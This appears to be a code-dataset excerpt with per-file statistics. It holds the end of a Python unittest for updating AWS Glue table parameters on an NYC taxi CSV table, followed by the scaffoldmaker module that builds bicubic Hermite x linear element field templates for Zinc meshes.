"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*",'
'"s3://nyc-tlc/misc/uber*","s3://nyc-tlc/misc/*.html",'
'"s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
"StoredAsSubDirectories": False,
},
"PartitionKeys": [],
"TableType": "EXTERNAL_TABLE",
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*","s3://nyc-tlc/misc/uber*",'
'"s3://nyc-tlc/misc/*.html","s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
"CreatedBy": "arn:aws:sts::172965158661:assumed-role/LakeFormationWorkflowRole/AWS-Crawler",
"IsRegisteredWithLakeFormation": False,
}
expected_table_params = {
"Name": "csv_misc",
"Owner": "owner",
"LastAccessTime": datetime.datetime(
2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()
),
"Retention": 0,
"StorageDescriptor": {
"Columns": [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "service_zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
],
"Location": "s3://nyc-tlc/misc/",
"InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
"OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
"Compressed": False,
"NumberOfBuckets": -1,
"SerdeInfo": {
"SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
"Parameters": {"field.delim": ","},
},
"BucketColumns": [],
"SortColumns": [],
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*","s3://nyc-tlc/misc/uber*",'
'"s3://nyc-tlc/misc/*.html","s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
"StoredAsSubDirectories": False,
},
"PartitionKeys": [],
"TableType": "EXTERNAL_TABLE",
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*","s3://nyc-tlc/misc/uber*",'
'"s3://nyc-tlc/misc/*.html","s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
}
updated_table_params = GlueStore.update_table_params(
table_params, updated_columns
)
self.assertEqual(updated_table_params, expected_table_params)
if __name__ == "__main__":
unittest.main()
| 39.22449 | 118 | 0.461498 | 869 | 11,532 | 5.998849 | 0.180667 | 0.024938 | 0.0399 | 0.05985 | 0.811241 | 0.791866 | 0.791866 | 0.769806 | 0.769806 | 0.769806 | 0 | 0.02217 | 0.374176 | 11,532 | 293 | 119 | 39.358362 | 0.700152 | 0 | 0 | 0.649254 | 0 | 0.033582 | 0.354925 | 0.123916 | 0 | 0 | 0 | 0 | 0.044776 | 1 | 0.029851 | false | 0 | 0.018657 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed7c5146ef0c0d4604a9f327860e419b8df6ea7c | 25,021 | py | Python | src/scaffoldmaker/utils/eftfactory_bicubichermitelinear.py | vickieshim/scaffoldmaker | 5740b58f401b45a8c1b328e1ca0b70a08d9d13ca | [
"Apache-2.0"
] | null | null | null | src/scaffoldmaker/utils/eftfactory_bicubichermitelinear.py | vickieshim/scaffoldmaker | 5740b58f401b45a8c1b328e1ca0b70a08d9d13ca | [
"Apache-2.0"
] | null | null | null | src/scaffoldmaker/utils/eftfactory_bicubichermitelinear.py | vickieshim/scaffoldmaker | 5740b58f401b45a8c1b328e1ca0b70a08d9d13ca | [
"Apache-2.0"
] | null | null | null | '''
Definitions of standard element field templates using bicubic Hermite x linear Lagrange basis.
'''
from scaffoldmaker.utils.eft_utils import remapEftLocalNodes, remapEftNodeValueLabel, setEftScaleFactorIds
from opencmiss.zinc.element import Elementbasis, Elementfieldtemplate
from opencmiss.zinc.node import Node
from opencmiss.zinc.status import OK as ZINC_OK
class eftfactory_bicubichermitelinear:
'''
Factory class for creating element field templates for a 3-D mesh using bicubic Hermite x linear Lagrange basis.
'''
def __init__(self, mesh, useCrossDerivatives, linearAxis = 3,
d_ds1 = Node.VALUE_LABEL_D_DS1, d_ds2 = Node.VALUE_LABEL_D_DS2):
'''
:param mesh: Zinc mesh to create element field templates in.
:param useCrossDerivatives: Set to True if you want cross derivative terms.
:param linearAxis: 1, 2, or 3.
:param d_ds1: Node derivative to use in Hermite axis 1: Node.VALUE_LABEL_D_DS1, Node.VALUE_LABEL_D_DS2.
:param d_ds2: Node derivative to use in Hermite axis 2, > d_ds1: Node.VALUE_LABEL_D_DS2 or Node.VALUE_LABEL_D_DS3.
'''
assert mesh.getDimension() == 3, 'eftfactory_bicubichermitelinear: not a 3-D Zinc mesh'
assert linearAxis in [ 1, 2, 3 ], 'eftfactory_bicubichermitelinear: linearAxis must be 1, 2 or 3'
assert d_ds1 in [ Node.VALUE_LABEL_D_DS1, Node.VALUE_LABEL_D_DS2 ], 'eftfactory_bicubichermitelinear: invalid d_ds1'
assert d_ds2 in [ Node.VALUE_LABEL_D_DS2, Node.VALUE_LABEL_D_DS3 ] and (d_ds2 > d_ds1), 'eftfactory_bicubichermitelinear: invalid d_ds2'
self._mesh = mesh
self._useCrossDerivatives = useCrossDerivatives
self._linearAxis = linearAxis
self._d_ds1 = d_ds1
self._d_ds2 = d_ds2
self._d2_ds1ds2 = Node.VALUE_LABEL_D2_DS2DS3 if (d_ds1 == Node.VALUE_LABEL_D_DS2) \
else Node.VALUE_LABEL_D2_DS1DS3 if (d_ds2 == Node.VALUE_LABEL_D_DS3) \
else Node.VALUE_LABEL_D2_DS1DS2
self._fieldmodule = mesh.getFieldmodule()
self._basis = self._fieldmodule.createElementbasis(3, Elementbasis.FUNCTION_TYPE_CUBIC_HERMITE)
self._basis.setFunctionType(linearAxis, Elementbasis.FUNCTION_TYPE_LINEAR_LAGRANGE)
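# Usage sketch (``fieldmodule``, ``coordinates`` and ``elementtemplate`` are
# hypothetical Zinc objects set up by the caller):
#
#   mesh = fieldmodule.findMeshByDimension(3)
#   eftfactory = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives=False)
#   eft = eftfactory.createEftBasic()
#   elementtemplate.defineField(coordinates, -1, eft)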
def _remapDefaultNodeDerivatives(self, eft):
'''
Remap the Hermite node derivatives to those chosen in __init__.
Use only on first create.
:param eft: The element field template to remap.
'''
# must do d_ds2 first!
if self._d_ds2 != Node.VALUE_LABEL_D_DS2:
remapEftNodeValueLabel(eft, range(1, 9), Node.VALUE_LABEL_D_DS2, [ (self._d_ds2, []) ])
if self._d_ds1 != Node.VALUE_LABEL_D_DS1:
remapEftNodeValueLabel(eft, range(1, 9), Node.VALUE_LABEL_D_DS1, [ (self._d_ds1, []) ])
if self._d2_ds1ds2 != Node.VALUE_LABEL_D2_DS1DS2:
remapEftNodeValueLabel(eft, range(1, 9), Node.VALUE_LABEL_D2_DS1DS2, [ (self._d2_ds1ds2, []) ])
def createEftBasic(self):
'''
Create the basic bicubic Hermite x linear Lagrange element template with 1:1 mappings to
node derivatives ds1 & ds2, with or without cross derivatives according to how the factory was initialised.
:return: Element field template
'''
if not self._useCrossDerivatives:
return self.createEftNoCrossDerivatives()
eft = self._mesh.createElementfieldtemplate(self._basis)
self._remapDefaultNodeDerivatives(eft)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftBasic: Failed to validate eft'
return eft
def createEftNoCrossDerivatives(self):
'''
Create a basic bicubic hermite linear element template with 1:1 mappings to
node derivatives ds1 & ds2, without cross derivatives.
:return: Element field template
'''
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in range(8):
eft.setFunctionNumberOfTerms(n*4 + 4, 0)
self._remapDefaultNodeDerivatives(eft)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftNoCrossDerivatives: Failed to validate eft'
return eft
def createEftShellPoleBottom(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for closing bottom pole of a shell.
Element is collapsed in xi1 on xi2 = 0.
Each collapsed node has 3 scale factors giving the cos, sin coefficients
of the radial line from global derivatives, plus the arc subtended by
the element in radians, so the pole can be rounded.
Need to create a new template for each sector around pole giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 100 for each radial line around pole.
:param nodeScaleFactorOffset0: offset of node scale factors at pole on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at pole on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear to remap D2_DS1DS2 at pole
eft = self._mesh.createElementfieldtemplate(self._basis)
if not self._useCrossDerivatives:
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n*4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3,
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ])
# remap parameters before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
so = layer*6 + 1
ln = layer*4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 1]), (Node.VALUE_LABEL_D_DS2, [so + 2]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 2, so + 3]), (Node.VALUE_LABEL_D_DS2, [1, so + 1, so + 3]) ])
ln = layer*4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 4]), (Node.VALUE_LABEL_D_DS2, [so + 5]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 5, so + 6]), (Node.VALUE_LABEL_D_DS2, [1, so + 4, so + 6]) ])
ln_map = [ 1, 1, 2, 3, 4, 4, 5, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftShellPoleBottom: Failed to validate eft'
return eft
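# Sketch of the nodeScaleFactorOffset convention suggested in the docstring
# (the step of 100 and the wrap-around are illustrative assumptions):
#
#   for sector in range(elementsCountAround):
#       eft = eftfactory.createEftShellPoleBottom(
#           sector*100, ((sector + 1) % elementsCountAround)*100)
#
# Adjacent sectors then present identical scale factor identifiers on their
# shared radial face, so the scale factors are merged across elements.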
def createEftShellPoleTop(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for closing top pole of a shell.
Element is collapsed in xi1 on xi2 = 1.
Each collapsed node has 3 scale factors giving the cos, sin coefficients
of the radial line from global derivatives, plus the arc subtended by
the element in radians, so the pole can be rounded.
Need to create a new template for each sector around pole giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 100 for each radial line around pole.
:param nodeScaleFactorOffset0: offset of node scale factors at pole on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at pole on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear to remap D2_DS1DS2 at pole
eft = self._mesh.createElementfieldtemplate(self._basis)
if not self._useCrossDerivatives:
for n in [ 0, 1, 4, 5 ]:
eft.setFunctionNumberOfTerms(n*4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3,
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ])
# remap parameters before collapsing nodes
remapEftNodeValueLabel(eft, [ 3, 4, 7, 8 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
so = layer*6 + 1
ln = layer*4 + 3
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 1]), (Node.VALUE_LABEL_D_DS2, [so + 2]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [1, so + 2, so + 3]), (Node.VALUE_LABEL_D_DS2, [so + 1, so + 3]) ])
ln = layer*4 + 4
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 4]), (Node.VALUE_LABEL_D_DS2, [so + 5]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [1, so + 5, so + 6]), (Node.VALUE_LABEL_D_DS2, [so + 4, so + 6]) ])
ln_map = [ 1, 2, 3, 3, 4, 5, 6, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftShellPoleTop: Failed to validate eft'
return eft
def createEftSplitXi1RightStraight(self):
'''
Create an element field template suitable for the inner elements of the
join between left and right chambers, with xi1 bifurcating to right.
Straight through version.
Only works with linearAxis 2.
:return: Element field template
'''
assert self._linearAxis == 2, 'eftfactory_bicubichermitelinear.createEftSplitXi1RightStraight: Not linearAxis 2'
eft = self.createEftNoCrossDerivatives()
setEftScaleFactorIds(eft, [1], [])
remapEftNodeValueLabel(eft, [ 5, 7 ], self._d_ds1, [ (self._d_ds1, []), (self._d_ds2, [1]) ])
remapEftNodeValueLabel(eft, [ 6, 8 ], self._d_ds1, [ (self._d_ds1, []), (self._d_ds2, []) ])
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftSplitXi1RightStraight: Failed to validate eft'
return eft
def createEftSplitXi1RightOut(self):
'''
Create an element field template suitable for the outer elements of the
join between left and right chambers, with xi1 bifurcating to right.
Right out version i.e. xi1 heading to right. h-shape.
Only works with linearAxis 2.
:return: Element field template
'''
assert self._linearAxis == 2, 'eftfactory_bicubichermitelinear.createEftSplitXi1RightOut: Not linearAxis 2'
eft = self.createEftNoCrossDerivatives()
setEftScaleFactorIds(eft, [1], [])
remapEftNodeValueLabel(eft, [ 1, 3 ], self._d_ds1, [ (self._d_ds1, [1]) ])
remapEftNodeValueLabel(eft, [ 1, 3 ], self._d_ds2, [ (self._d_ds1, [1]), (self._d_ds2, [1]) ])
remapEftNodeValueLabel(eft, [ 5, 7 ], self._d_ds2, [ (self._d_ds1, [1]), (self._d_ds2, []) ])
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftSplitXi1RightOut: Failed to validate eft'
return eft
def createEftOpenTube(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary where a tube is opened on xi1 = 1 for a flat preparation.
Could eventually have 6 variants. Retain node numbering with two versions
for boundary nodes.
:return: Element field template
'''
eft = self.createEftBasic()
for n in [ 1, 3, 5, 7 ]:
ln = n + 1
eft.setTermNodeParameter(n*4 + 1, 1, ln, Node.VALUE_LABEL_VALUE, 2)
eft.setTermNodeParameter(n*4 + 2, 1, ln, Node.VALUE_LABEL_D_DS1, 2)
eft.setTermNodeParameter(n*4 + 3, 1, ln, Node.VALUE_LABEL_D_DS2, 2)
if self._useCrossDerivatives:
eft.setTermNodeParameter(n*4 + 4, 1, ln, Node.VALUE_LABEL_D2_DS1DS2, 2)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftOpenTube: Failed to validate eft'
return eft
def createEftWedgeXi1One(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary of tenia coli where nodes on xi1 = 1 are collapsed.
:return: Element field template
'''
eft = self.createEftBasic()
ln_map = [ 1, 2, 3, 4, 5, 2, 6, 4 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftWedgeXi1One: Failed to validate eft'
return eft
def createEftWedgeXi1Zero(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary of tenia coli where nodes on xi1 = 0 are collapsed.
:return: Element field template
'''
eft = self.createEftBasic()
ln_map = [ 1, 2, 3, 4, 1, 5, 3, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftWedgeXi1Zero: Failed to validate eft'
return eft
def createEftWedgeXi1ZeroOpenTube(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary of tenia coli where nodes on xi1 = 0 are collapsed
where a tube is opened on xi1 = 1 for a flat preparation.
:return: Element field template
'''
eft = self.createEftBasic()
for n in [ 1, 3, 5, 7 ]:
ln = n + 1
eft.setTermNodeParameter(n*4 + 1, 1, ln, Node.VALUE_LABEL_VALUE, 2)
eft.setTermNodeParameter(n*4 + 2, 1, ln, Node.VALUE_LABEL_D_DS1, 2)
eft.setTermNodeParameter(n*4 + 3, 1, ln, Node.VALUE_LABEL_D_DS2, 2)
if self._useCrossDerivatives:
eft.setTermNodeParameter(n*4 + 4, 1, ln, Node.VALUE_LABEL_D2_DS1DS2, 2)
ln_map = [ 1, 2, 3, 4, 1, 5, 3, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftWedgeXi1ZeroOpenTube: Failed to validate eft'
return eft
def createEftTetrahedronXi1One(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for a solid tetrahedron for the apex of cecum,
with xi1 and xi3 collapsed on xi2 = 0, and xi3 collapsed on xi1 = 1 and xi2 = 1.
Each collapsed node on xi2 = 0 has 3 scale factors giving the cos, sin coefficients of
the radial line from global derivatives, plus the arc subtended by the element in radians,
so the circumferential direction is rounded.
Need to create a new template for each sector around axis giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 10000 for each radial line around axis.
:param nodeScaleFactorOffset0: offset of node scale factors at axis on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at axis on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n * 4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ] )
# remap parameters on xi2 = 0 before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
soAround = 1
ln = layer * 4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 1]),
(Node.VALUE_LABEL_D_DS2, [soAround + 2])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 2, soAround + 3]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 1, soAround + 3])])
ln = layer * 4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 4]),
(Node.VALUE_LABEL_D_DS2, [soAround + 5])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 5, soAround + 6]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 4, soAround + 6])])
ln_map = [ 1, 1, 2, 3, 1, 1, 4, 3]
remapEftLocalNodes(eft, 4, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftTetrahedronXi1One: Failed to validate eft'
return eft
def createEftTetrahedronXi1Zero(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for a solid tetrahedron for the apex of cecum,
with xi1 and xi3 collapsed on xi2 = 0, and xi3 collapsed on xi1 = 0, xi2 = 1.
Each collapsed node on xi2 = 0 has 3 scale factors giving the cos, sin coefficients of
the radial line from global derivatives, plus the arc subtended by the element in radians,
so the circumferential direction is rounded.
Need to create a new template for each sector around axis giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 10000 for each radial line around axis.
:param nodeScaleFactorOffset0: offset of node scale factors at axis on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at axis on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n * 4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ])
# remap parameters on xi2 = 0 before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
soAround = 1
ln = layer * 4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 1]),
(Node.VALUE_LABEL_D_DS2, [soAround + 2])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 2, soAround + 3]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 1, soAround + 3])])
ln = layer * 4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 4]),
(Node.VALUE_LABEL_D_DS2, [soAround + 5])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 5, soAround + 6]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 4, soAround + 6])])
ln_map = [ 1, 1, 2, 3, 1, 1, 2, 4]
remapEftLocalNodes(eft, 4, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftTetrahedronXi1Zero: Failed to validate eft'
return eft
def createEftPyramidBottomSimple(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for a solid pyramid for elements within
a tenia coli joining to the cecal apex, with xi1 and xi3 collapsed on xi2 = 0.
Each collapsed node has 3 scale factors giving the cos, sin coefficients of the
radial line from global derivatives, plus the arc subtended by the element in radians,
so the circumferential direction is rounded. Need to create a new template for each
sector around axis giving common nodeScaleFactorOffset values on common faces.
Suggestion is to start at 0 and add 10000 for each radial line around axis.
:param nodeScaleFactorOffset0: offset of node scale factors at axis on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at axis on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n * 4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3])
# remap parameters on xi2 = 0 before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
soAround = 1
ln = layer * 4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 1]), (Node.VALUE_LABEL_D_DS2, [soAround + 2])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 2, soAround + 3]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 1, soAround + 3])])
ln = layer * 4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 4]), (Node.VALUE_LABEL_D_DS2, [soAround + 5])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 5, soAround + 6]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 4, soAround + 6])])
ln_map = [ 1, 1, 2, 3, 1, 1, 4, 5 ]
remapEftLocalNodes(eft, 5, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftPyramidBottomSimple: Failed to validate eft'
return eft
| 57.652074 | 170 | 0.644499 | 3,110 | 25,021 | 5.048553 | 0.080064 | 0.053882 | 0.083816 | 0.071651 | 0.842749 | 0.834533 | 0.820776 | 0.763964 | 0.743328 | 0.717407 | 0 | 0.043593 | 0.272971 | 25,021 | 433 | 171 | 57.785219 | 0.819526 | 0.331641 | 0 | 0.629464 | 0 | 0 | 0.088366 | 0.06129 | 0 | 0 | 0 | 0 | 0.084821 | 1 | 0.066964 | false | 0 | 0.017857 | 0 | 0.151786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
71f8d9685f2b872481ade8f59bd3b9f0792b445f | 15,985 | py | Python | watertap/unit_models/zero_order/tests/test_ozone_aop_zo.py | kurbansitterley/watertap | 1a8986a779bdcb36f1481f03eed24c6c42d26481 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/unit_models/zero_order/tests/test_ozone_aop_zo.py | kurbansitterley/watertap | 1a8986a779bdcb36f1481f03eed24c6c42d26481 | [
"BSD-3-Clause-LBNL"
